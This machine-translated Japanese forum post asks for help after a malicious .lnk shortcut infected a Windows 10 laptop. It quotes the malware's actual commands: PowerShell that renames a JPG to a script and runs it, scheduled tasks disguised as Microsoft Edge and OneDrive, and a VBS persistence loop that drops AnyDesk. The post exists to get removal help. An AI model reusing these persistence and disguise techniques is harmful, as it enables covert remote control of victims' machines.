マルウェアを特定し、完全に削除されたかどうかを確認するのに役立ちます

Windows 10(ホーム)を実行している父のラップトップが安全であることを確認しようとしています.父は1つの.rarファイルに多数のPDFをダウンロードしたいと考えていました.抽出すると、いくつかの.jpgファイルとCollection.lnkファイルが含まれていました.彼は次のことを実行した.lnkファイルをクリックしました:
(イベントビューアによって記録されたとおり)
...
HostApplication=C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe-nologo-ExecutionPolicy Unrestricted-command rename-item cover.jpg c.ps1; .\c.ps1
...
これは(上記を理解できる限り)jpgの1つを名前変更し、そのコンテンツを実行しました:

attrib + s + h Collection.lnk

tar-xzvf cover6.jpg

tar-xzvf cover4.jpg-CC:\Users\Public\

tar-xzvf cover5.jpg-CC:\Users\Public\

$ a= New-ScheduledTaskAction-Execute "C:\Users\Public\MicrosoftEdger\MicrosoftOut.exe"

$ tr= New-ScheduledTaskTrigger-Daily-At(get-date).AddMinutes(6).ToString( "HH:mm")

$ option= New-ScheduledTaskSettingsSet-AllowStartIfOnBatteries-ExecutionTimeLimit 0

$ t= Register-ScheduledTask-TaskName "MicrosoftEdge1"-Trigger $ tr-Action $ a-Settings $ option

$ t.Triggers.Repetition.Duration= 'P7300D'

$ t.Triggers.Repetition.Interval= 'PT30M'

$ t|Set-ScheduledTask

$ a= $ env:APPDATA

$ taskExists= Get-ScheduledTask|Where-Object {$ _.TaskName-like'MicrosoftEdge1 '}

$ a= New-ScheduledTaskAction-Execute "C:\Users\Public\onedriver\Runer.vbs"

$ tr= New-ScheduledTaskTrigger-Daily-At(get-date).AddMinutes(3).ToString( "HH:mm")

$ option= New-ScheduledTaskSettingsSet-AllowStartIfOnBatteries-ExecutionTimeLimit 0

$ t= Register-ScheduledTask-TaskName "onedriver"-Trigger $ tr-Action $ a-Settings $ option

$ t.Triggers.Repetition.Duration= 'P7300D'

$ t.Triggers.Repetition.Interval= 'PT30M'

$ t|Set-ScheduledTask

$ a= $ env:APPDATA

タスクスケジューラで両方のタスクとそれらが参照するフォルダを手動で削除しました(これらはcover4とcover5のコンテンツから抽出されました
(私が知る限り、cover6.jpgにはPDFだけが含まれています)
cover4には、MicrosoftEdgerフォルダーが含まれています:(括弧内のファイル詳細情報)
bz2.pyd
gcapi.dll
mfc90.dll
MicrosoftAn.exe(AnyDesk)
MicrosoftOut.exe(Softonic)
nircmd.exe
python27.dll
pythoncom27.dll
pyWintypes27.dll
select.pyd
unicodedata.pyd
Win32api.pyd
Win32ui.pyd
_hashlib.pyd
_socket.pyd
_Win32sysloader.pyd
およびcover5-onedriver-with:
data.exe
onedriver.exe
Runer.vbs
Runer.vbs:

オプションの明示

DIM strcomputer、strProcess

strcomputer= "." 'ローカルコンピュータ

strProcess= "onedriver.exe"

薄暗いoShell

oShell= WScript.CreateObject( "WSCript.shell")を設定します

'電卓が指定されたコンピューター(.=ローカルコンピューター)で実行されているかどうかを確認します

IF isProcessRunning(strcomputer、strProcess)THEN

a= 0

その他

oShell.Run "C:\Users\Public\onedriver\onedriver.exe"、1、true

oShell= Nothing

END IF

'プロセスが実行されているかどうかを確認する関数

関数isProcessRunning(BYVAL strcomputer、BYVAL strProcessName)

DIM objWMIService、strWMIQuery

strWMIQuery= "Select* from Win32_Process where name like '"&strProcessName&"'"

SET objWMIService= GETOBJECT( "Winmgmts:" _

&"{impersonationLevel= impersonate} ！\\"_

&strcomputer&"\root\cimv2")

IF objWMIService.ExecQuery(strWMIQuery).Count>0 THEN

isProcessRunning= TRUE

その他

isProcessRunning= FALSE

END IF

終了機能
誰かがこれを特定し、私がすべてを削除したかどうか、および/またはどのような害があった可能性があるかを確認するための良い解決策を見つけるのを手伝ってくれることを願っています.無料のMalwarebytesが問題を報告せず、40以上の脅威を検出した後、Microsoft Safety Scanner(クイックScan+ユーザーディレクトリ)を実行しましたが、最後のレポートにはリストされているだけです